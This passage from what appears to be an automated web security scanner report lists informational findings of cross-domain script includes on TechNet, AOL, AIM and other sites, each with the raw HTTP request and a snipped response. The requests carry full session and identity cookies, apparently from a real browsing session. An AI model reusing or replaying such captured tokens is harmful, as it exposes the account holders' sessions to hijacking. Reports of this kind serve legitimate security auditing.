P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.25. http://technet.microsoft.com/en-us/security/cc308589  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/security/cc308589

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/security/cc308589 HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092875333:ss=1301092848759; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi\00018@E0H02h8@E0H

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11826
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:41:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.26. http://technet.microsoft.com/en-us/security/default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/security/default

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/security/default HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; Sto.UserLocale=en-us; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093006535:ss=1301092848759; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine|en-us/library:3=en-us/subscriptions/downloads

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43558
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:43:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.27. http://technet.microsoft.com/en-us/security/ff852094.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/security/ff852094.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/security/ff852094.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/technet/security/bulletin/alertus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092958107:ss=1301092848759; Sto.UserLocale=en-us

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17100
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.28. http://www.aim.com/products/express/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aim.com
Path:   /products/express/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/express/ HTTP/1.1
Host: www.aim.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:17 GMT
Server: Apache
ntCoent-Length: 6299
Content-Type: text/html
Content-Length: 6299

<html>
<head>
<link href="http://o.aolcdn.com/os/aim_web/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AIM -
...[SNIP]...
<link href="http://o.aolcdn.com/os/aim_web/aimcom/main.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://o.aolcdn.com/os/aim_web/aimcom/jquery.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aim_web/aimcom/main.js"></script>
...[SNIP]...
21.29. http://www.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; s_pers=%20s_getnr%3D1300982991291-Repeat%7C1364054991291%3B%20s_nrgvo%3DRepeat%7C1364054991293%3B; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc27.websys.aol.com
Content-Type: text/html;;charset=utf-8
Content-Length: 71386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<body class="flag_feathers">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
<div class="mpid-4">
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v40.2.0/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
21.30. http://www.cloudscan.me/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=661-1298944414038; __utmz=117772502.1301140355.7.4.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=117772502.1890718854.1299187703.1301068080.1301140355.7; __utmc=117772502; __utmb=117772502.1.10.1301140355
If-None-Match: "a3c7b1e7-f4a1-4e8b-8d61-c50daed309da"
If-Modified-Since: Tue, 22 Mar 2011 17:32:50 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Mar 2011 11:58:19 GMT
Date: Sat, 26 Mar 2011 11:58:19 GMT
Last-Modified: Fri, 25 Mar 2011 15:59:46 GMT
ETag: "a0d58252-f523-4ab9-ac9c-f50dcedb40fb"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 90740
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/3417392778-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...
21.31. http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /2011/03/smartermail-80-stored-xss-reflected-xss.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/03/smartermail-80-stored-xss-reflected-xss.html HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://xss.cx/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=661-1298944414038; __utmz=117772502.1301068080.6.3.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=117772502.1890718854.1299187703.1300817214.1301068080.6
If-None-Match: "29683a7b-cdba-45f6-a1e4-0e91a82ddce5"
If-Modified-Since: Fri, 25 Mar 2011 11:29:39 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Mar 2011 11:51:46 GMT
Date: Sat, 26 Mar 2011 11:51:46 GMT
Last-Modified: Fri, 25 Mar 2011 15:59:46 GMT
ETag: "a0d58252-f523-4ab9-ac9c-f50dcedb40fb"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 83940
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/3289625564-comment_from_post_iframe.js"></script>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/3417392778-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...
21.32. http://www.cramerdev.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramerdev.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cramerdev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Arcturus%2ESession%2ECookie%2EValue=; path=/
Set-Cookie: Arcturus%2ESession%2ECookie=; path=/
Set-Cookie: MarkupFactory%5FInstallation%5FHandle=cramerdev; path=/
Set-Cookie: ASPSESSIONIDAAACSQCR=FFBDMJECFMGHLGCDAMPIOKHD; path=/
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:24:26 GMT
Content-Length: 6490

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="screen" href="/assets/cramerdev/960.css" />

...[SNIP]...
<meta name="description" content="Cramer Development is a world class website design and development team based out of Iowa." />


<script src="http://use.typekit.com/lvr1wgh.js"></script>
...[SNIP]...
<!-- close .footer -->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
21.33. http://www.cramerdev.com/get-in-touch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramerdev.com
Path:   /get-in-touch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /get-in-touch HTTP/1.1
Host: www.cramerdev.com
Proxy-Connection: keep-alive
Referer: http://www.cramerdev.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MarkupFactory%5FInstallation%5FHandle=cramerdev; ASPSESSIONIDAAACSQCR=FFBDMJECFMGHLGCDAMPIOKHD; __utmz=257688281.1301081104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Arcturus%2ESession%2ECookie=; Arcturus%2ESession%2ECookie%2EValue=; __utma=257688281.681488014.1301081104.1301081104.1301081104.1; __utmc=257688281; __utmb=257688281.4.10.1301081104

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Arcturus%2ESession%2ECookie%2EValue=; path=/
Set-Cookie: Arcturus%2ESession%2ECookie=; path=/
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:25:13 GMT
Content-Length: 7574

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="screen" href="/assets/cramerdev/960.css" />

...[SNIP]...
<meta name="description" content="" />


<script src="http://use.typekit.com/lvr1wgh.js"></script>
...[SNIP]...
<!-- close .footer -->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
21.34. http://www.cramerdev.com/get-in-touch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramerdev.com
Path:   /get-in-touch/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /get-in-touch/ HTTP/1.1
Host: www.cramerdev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MarkupFactory%5FInstallation%5FHandle=cramerdev; ASPSESSIONIDAAACSQCR=FFBDMJECFMGHLGCDAMPIOKHD; __utmz=257688281.1301081104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=257688281.681488014.1301081104.1301081104.1301081104.1; __utmc=257688281; __utmb=257688281.2.10.1301081104; Arcturus%2ESession%2ECookie=; Arcturus%2ESession%2ECookie%2EValue=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Arcturus%2ESession%2ECookie%2EValue=; path=/
Set-Cookie: Arcturus%2ESession%2ECookie=; path=/
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:25:13 GMT
Content-Length: 7574

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="screen" href="/assets/cramerdev/960.css" />

...[SNIP]...
<meta name="description" content="" />


<script src="http://use.typekit.com/lvr1wgh.js"></script>
...[SNIP]...
<!-- close .footer -->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
21.35. http://www.cramerdev.com/weblog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramerdev.com
Path:   /weblog/

Issue detail

